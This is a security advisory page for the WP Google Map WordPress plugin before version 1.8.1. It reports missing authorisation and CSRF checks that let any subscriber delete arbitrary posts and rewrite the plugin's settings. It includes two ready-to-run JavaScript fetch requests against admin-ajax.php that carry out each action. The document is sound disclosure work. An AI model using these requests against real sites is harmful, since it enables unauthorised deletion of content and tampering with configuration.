Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:6639DA0D-6D29-46C1-A3CC-5E5626305833
HistoryDec 08, 2021 - 12:00 a.m.

WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update

2021-12-0800:00:00
Krzysztof Zając
33

0.001 Low

EPSS

Percentile

21.5%

The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin’s settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory has been created for that

Removing post:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_remove_wpgmap&post_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Updating settings:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wpgmapembed_save_setup_wizard&wgm_api_key=hohohoho&wgm_language=999&wgm_regional_area=aaaaa",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

21.5%

Related for WPEX-ID:6639DA0D-6D29-46C1-A3CC-5E5626305833